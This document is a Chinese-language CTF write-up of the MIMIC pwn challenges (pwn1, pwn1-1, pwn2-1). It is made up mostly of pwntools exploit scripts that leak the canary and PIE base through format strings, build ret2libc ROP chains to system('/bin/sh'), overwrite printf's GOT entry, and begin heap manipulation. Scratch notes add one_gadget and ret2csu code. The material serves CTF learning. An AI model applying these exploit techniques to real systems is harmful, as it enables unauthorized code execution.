MIMIC
pwn1
程序送了一个代码地址;利用格式化字符串漏洞泄露 stack 地址和 canary;有后门,然后 ret2libc
exp:
#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *

# Target settings: 64-bit Linux binary, verbose pwntools logging for the walkthrough.
context.update(os='linux', arch='amd64', log_level="debug")
#context.arch = 'i386'

name = './pwn1'
debug = 0  # non-zero: talk to the remote service instead of a local process
p = remote('172.52.16.218', 9999) if debug else process(name)

# The system libc is loaded before the challenge binary (same order as before).
libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './libc-2.31.so'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']


# --- thin I/O wrappers around the tube `p` ------------------------------------
# Every send helper passes its argument through str() first, so a bytes payload
# would go out as the text "b'...'" on Python 3 (NOTE(review): presumably why
# the raw payload further down is sent with p.sendline directly).

def s(data):
    """Send str(data) without a trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(num):
    """Receive up to num bytes."""
    return p.recv(num)


def ru(delims, drop=True):
    """Receive until delims; the delimiter itself is dropped by default."""
    return p.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Unpack a <=4-byte value as little-endian u32.

    NOTE(review): pads with a str, while uu64 pads with bytes; on Python 3 a
    bytes argument raises TypeError here. Kept as in the original.
    """
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack a <=8-byte value as little-endian u64 (zero-padded on the right)."""
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    """Log a leaked address as `name = 0x...`."""
    return log.success('{} = {:#x}'.format(name, addr))


def li(x):
    """Print x highlighted (ANSI 256-colour index 214)."""
    return print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print x highlighted (ANSI 256-colour index 1)."""
    return print('\x1b[01;38;5;1m' + x + '\x1b[0m')


# Menu option numbers used by the (commented-out) add/delete/show/edit wrappers.
add_idx, delete_idx, show_idx, edit_idx = 1, 2, 4, 3
def dbg():
    """Attach gdb to the running target `p` and pause until the user continues."""
    target_pid = proc.pidof(p)[0]
    gdb.attach(target_pid)
    pause()
bss = elf.bss()  # recorded for reference only; not used by the payload below
li('bss = '+hex(bss))
# Unused string literal: menu wrappers from an earlier iteration (no runtime effect).
'''
def choice(cho):
sla('enter your command: \n',cho)
def add(idx):
choice(add_idx)
sla('choise:',idx)
def delete(idx):
choice(delete_idx)
sla('Index: \n',idx)
def show(idx):
choice(show_idx)
sla('Index: ',idx)
def edit(idx,content):
choice(edit_idx)
sla('Index: ',idx)
p.sendlineafter('Message: \n',content)
'''
# Menu walk: option 1 makes the program print a code address after "tricks\n".
ru('Welcome to mimic world,try something\n')
sl('1')
ru('tricks\n')
# 14 chars = "0x" + 12 hex digits; 0xa94 is the author's offset of that
# address from the PIE base (taken from the binary, not verifiable here).
pie = int(p.recv(14),16)-0xa94
li('pie = '+hex(pie))
# Option 2 reads input that reaches printf (the format-string bug described above).
sl('2')
ru('hello')
backdoor = pie+0xa00  # backdoor function; not used by the chain that is sent
li('backdoor = '+hex(backdoor))
# %43$p / %39$p print the 43rd and 39th variadic slots: a stack address and the
# canary respectively (positions determined by the author).
p.sendline('%43$p-%39$p')
p.recvuntil('\n')
stack = int(r(14),16) #- 0x1e5a8
li('stack = '+hex(stack))
ru('-')
canary = int(p.recv(18),16)  # "0x" + 16 hex digits
li('canary = '+hex(canary))
# NOTE: rebinds `sys`, shadowing the `import sys` at the top of the file.
sys = pie + 0x870  # presumably system's PLT stub (author's offset) — confirm
li('sys = '+hex(sys))
binsh = pie+0x202000+0x68  # presumably a "/bin/sh" string in the binary's data — confirm
li('binsh = '+hex(binsh))
# First draft of the payload; superseded by `pay` below and never sent.
pl = b'a'*0xc8 + p64(canary) + b'b'*8 #+ p64(backdoor)
pwd = stack - 0x140  # computed but unused
li('pwd = '+hex(pwd))
ret = pie + 0x821  # `ret` gadget (NOTE(review): purpose not stated on the page — confirm)
rdi = pie + 0xc73  # `pop rdi; ret` gadget
# 0xc8 bytes of filler up to the canary slot, the leaked canary so the check
# passes, 8 bytes for the saved rbp, then ret / pop rdi / binsh / sys.
pay = b'a'*0xc8 + p64(canary) + b'b'*8 + p64(ret) + p64(rdi) + p64(binsh) + p64(sys)
# Unused string literal: an earlier probing run that dumps stack slots (no runtime effect).
'''
ru('Welcome to mimic world,try something\n')
sl('1')
ru('tricks\n')
pie = int(p.recv(14),16)-0xa94
li('pie = '+hex(pie))
sl('2')
sl('aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p--%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-')
'''
#dbg()
p.sendline(pay)  # sent raw, bypassing the str()-wrapping helpers
itr()
#print('========================================================================================')
# Scratch notes from the author kept as unused string literals: an entry-point
# stub, libc gadget lookups, a disassembly excerpt, helper sketches, one_gadget
# constraints, a gdb helper and a ret2csu sketch. None of it runs.
'''
def pwn():
if __name__ == '__main__':
pwn()
'''
#print('========================================================================================')
'''
bss = elf.bss()
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
system_add = libc_base + libc.sym['system']
binsh_add = libc_base + next(libc.search(b'/bin/sh')
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
syscall = libc_base + libc.sym['syscall']
gadget = libc_base + libc.sym['svcudp_reply'] + 0x1a
li('gadget = '+hex(gadget))
mov rbp,QWORD PTR [rdi+0x48]
mov rax,QWORD PTR [rbp+0x18]
lea r13,[rbp+0x10]
mov DWORD PTR [rbp+0x10],0x0
mov rdi,r13
call QWORD PTR [rax+0x28]
'''
#print('========================================================================================')
'''
def ret2libc_leak(main,got,plt,offset):
if x64_32:
payload = b'a'*offset + b'b'*8 + p64(rdi) + p64(got) + p64(plt) + p64(main)
else:
payload = b'a'*offset + b'b'*4 + p32(plt) + p32(main) + p32(got)
return payload
def fmt_w(flag,num,offset):
if flag==2:
payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hn'
elif flag==1:
payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hhn'
'''
#print('========================================================================================')
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''
#print('========================================================================================')
'''
def dbg(cmd=''):
os.system('tmux set mouse on')
context.terminal = ['gnome-terminal','-x','sh','-c']
gdb.attach(p,cmd)
pause()
command = 'b *'+ str(hex(gadget))+'\n'
dbg(command)
'''
#print('========================================================================================')
'''
sign = 'asc'
def csu(padding, rbx, rbp, r12, r13, r14, r15, ret_addr):
payload = padding
payload+= p64(gadgets1)
payload += 'b'*8
payload+= p64(rbx)
payload+= p64(rbp)
payload+= p64(r12)
if sign == 'asc':
payload+= p64(r13)
payload+= p64(r14)
payload+= p64(r15)
elif sign == 'desc':
payload+= p64(r15)
payload+= p64(r14)
payload+= p64(r13)
payload+= p64(gadgets2)
payload += 'c' * 0x38
payload += p64(ret_addr)
p.sendline(payload)
csu(write_got,1,write_got,8,main_addr)
'''
#print('========================================================================================')
pwn1-1
让人眼前一愣
func
# Payload line quoted from the exp below; the 0xe0 + p64(0) prefix is what the
# following paragraphs discuss (0xe8 to rbp per the author's gdb check).
pl = b'a'*0xe0 + p64(0)+p64(pie+0x4000)+p64(0)+p64(ret)+p64(rdi)+p64(binsh)+p64(sys)
看到师傅exp里的b'a'*0xe0 + p64(0)
感到疑惑,没意识到这个大小是从哪里得到的
在 read 处查看一下 buf,它距离 rbp 有 0xe8,而 IDA 里显示的是 0x10
听大能猫爷说的好像ida里面显示的buf是func里的栈,而gdb里面显示的应该是read里面的栈吧...
exp:
# pwn1-1: same menu walk as pwn1; the printed address is 0x12a0 above the PIE base here.
ru('Welcome to mimic world,try something\n')
sl('1')
ru('tricks\n')
pie = int(p.recv(14),16) - 0x12a0  # 14 chars = "0x" + 12 hex digits
li('pie = '+hex(pie))
sl('2')
ru('hello')
# Offsets below are the author's and cannot be checked from this page.
# NOTE: `sys` shadows the template's `import sys` when run in the same file.
sys = pie+0x1040
li('sys = '+hex(sys))
backdoor = pie+0x1180  # not used by `pl`
li('backdoor = '+hex(backdoor))
binsh = pie+0x4050
li('binsh = '+hex(binsh))
ret = pie+0x101a  # `ret` gadget
rdi = pie+0x1943  # `pop rdi; ret` gadget
printf_got = pie + elf.got['printf']
# 0xe0 bytes of filler plus p64(0) (0xe8 to rbp per the author's gdb check),
# then pie+0x4000, a zero qword, and ret / pop rdi / binsh / sys.
pl = b'a'*0xe0 + p64(0)+p64(pie+0x4000)+p64(0)+p64(ret)+p64(rdi)+p64(binsh)+p64(sys)
# Built but not sent on this path; the alternative further down sends it instead.
payload = fmtstr_payload(8,{printf_got:p64(sys)})
dbg()  # attaches gdb before the payload goes out
p.sendline(pl)
还有一种方法是利用 pwntools 自带的工具实现格式化字符串任意写,把 printf 的 GOT 表项改为 system 的 PLT 地址
# Alternative path: pwntools builds the format-string write (argument offset 8,
# as found by the author) that replaces printf's GOT entry with `sys`; "/bin/sh"
# is then sent as the next input.
payload = fmtstr_payload(8,{printf_got:p64(sys)})
p.sendline(payload)
p.sendline("/bin/sh")
pwn2-1
没有 UAF,数量限制为 10,但版本很低,还有后门
要用ubuntu16打
# pwn2-1: add/delete/show are menu wrappers that are not shown on this page.
ru(b'let us give you some tips\n')
addr = int(r(14),16)  # "0x" + 12 hex digits
text_base = addr-0x11f0  # author's offset of the hint address from the text base
leak("text_base",text_base)
magic_addr = text_base + 0x1b70  # computed but unused in the lines shown
menu_addr = text_base + 0x1c10
add(0x38,b'aaaa') #0
add(0x38,b'aaaa') #1
delete(0)
delete(1)
# NOTE(review): why a 0x18 allocation holding menu_addr follows the two frees
# cannot be determined from this page alone — confirm against the binary.
add(0x18, p64(menu_addr))
#dbg('')
show(0)